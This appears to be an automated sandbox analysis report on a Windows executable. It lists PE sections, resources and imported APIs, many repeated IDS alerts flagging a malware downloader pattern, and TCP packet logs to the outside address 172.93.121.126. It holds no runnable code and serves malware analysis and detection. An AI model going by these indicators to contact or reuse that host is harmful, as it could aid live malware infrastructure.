                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x62a50x6400f4cff166abb4376522cf86cbd302f644False0.658984375data6.431390019180314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x2b0000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x500000x5ab180x5ac008e289f0503c71e1dae735f54bd537b3dFalse0.3740799328512397data4.762577612489826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x504a80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.35952525372074445
                                              RT_ICON0x924d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.3869188453803383
                                              RT_ICON0xa2cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.5096473029045643
                                              RT_ICON0xa52a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6343808630393997
                                              RT_ICON0xa63480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5815565031982942
                                              RT_ICON0xa71f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6877049180327869
                                              RT_ICON0xa7b780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.723826714801444
                                              RT_ICON0xa84200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.6359447004608295
                                              RT_ICON0xa8ae80x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.2725609756097561
                                              RT_ICON0xa91500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4602601156069364
                                              RT_ICON0xa96b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7606382978723404
                                              RT_ICON0xa9b200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.34139784946236557
                                              RT_ICON0xa9e080x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.39549180327868855
                                              RT_ICON0xa9ff00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.44594594594594594
                                              RT_DIALOG0xaa1180xb8dataEnglishUnited States0.6467391304347826
                                              RT_DIALOG0xaa1d00x144dataEnglishUnited States0.5216049382716049
                                              RT_DIALOG0xaa3180x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0xaa4180x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0xaa5380x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0xaa5980xcadataEnglishUnited States0.5792079207920792
                                              RT_VERSION0xaa6680x21cdataEnglishUnited States0.5314814814814814
                                              RT_MANIFEST0xaa8880x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625

                                              Imports

                                              DLLImport
                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-25T07:10:15.414083+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:16.425791+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:16.924356+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:17.433680+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:17.937521+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:18.443656+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:18.941014+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:19.452236+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:19.961128+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:20.656657+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:21.158710+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:21.845112+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:22.531390+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:23.053053+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:23.735340+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:24.421656+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:25.109884+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:25.799845+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:26.296691+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:26.989058+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:27.484129+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:28.171764+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:28.861049+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:29.359928+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:29.860219+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:30.363969+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:30.860822+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:31.360829+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:31.926133+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:32.443785+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:33.124946+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:33.625575+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:34.314657+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:34.877413+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:35.374658+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:35.875189+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:36.375607+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:36.874871+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:37.375080+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:37.874325+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:38.376401+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:38.874743+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:39.375269+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:40.063815+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:40.562441+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:41.301644+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:41.800527+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:42.312703+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:42.813258+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:43.503967+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:44.079831+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:44.578179+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:45.078376+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:45.766469+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:46.265958+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:47.421828+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:47.921830+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:48.421627+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:48.922449+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:49.632921+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:50.329237+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:51.018693+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:51.520982+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:52.017563+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:52.575298+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:53.082123+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:53.578696+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:54.265704+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:54.766529+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:55.500728+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:56.000236+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:56.499944+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:56.999819+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:57.500463+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:58.047012+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:58.546788+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:59.054871+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:10:59.546809+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:00.254704+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:00.938221+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:01.442254+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:01.937220+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:02.438608+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:02.937446+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:03.438644+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:03.937560+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:04.440018+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:04.985366+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:05.656175+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:06.156425+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:06.657181+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:07.158738+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:07.843879+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:08.347101+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:08.843842+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:09.533122+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:10.033404+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:10.533338+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:11.387665+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:11.900404+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:12.407056+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:12.908280+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:13.407573+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:13.907182+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:14.406156+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:14.906136+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:15.406184+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:15.907688+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:16.593836+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:17.097669+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:17.594390+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:18.094773+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:18.593749+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:19.093741+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:19.593973+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:20.111587+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:20.615394+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:21.109632+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:21.609591+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP
                                              2024-11-25T07:11:22.109947+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834172.93.121.12680TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2024 07:10:14.040822983 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:14.163268089 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:14.163348913 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:14.168566942 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:14.288048983 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:15.414000988 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:15.414083004 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:15.656476021 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:15.656558990 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:15.770201921 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:15.889679909 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:16.425268888 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:16.425791025 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:16.535634041 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:16.537261963 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:16.537348032 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:16.655083895 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:16.924293041 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:16.924355984 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:17.035450935 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:17.155257940 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:17.433568001 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:17.433680058 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:17.551203012 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:17.671361923 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:17.937314034 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:17.937520981 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:18.051119089 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:18.170659065 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:18.443531036 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:18.443655968 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:18.553822041 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:18.673327923 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:18.939944029 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:18.941014051 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:19.065701962 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:19.185208082 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:19.452161074 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:19.452235937 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:19.573595047 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:19.693490028 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:19.959758997 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:19.961127996 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:20.151606083 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:20.151686907 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:20.270236969 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:20.389733076 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:20.656481981 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:20.656656981 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:20.772357941 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:20.891948938 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:21.158471107 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:21.158710003 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:21.350328922 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:21.350385904 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:21.457690954 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:21.577238083 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:21.843930006 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:21.845112085 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:10:22.035811901 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:10:22.036042929 CET4983480192.168.2.7172.93.121.126
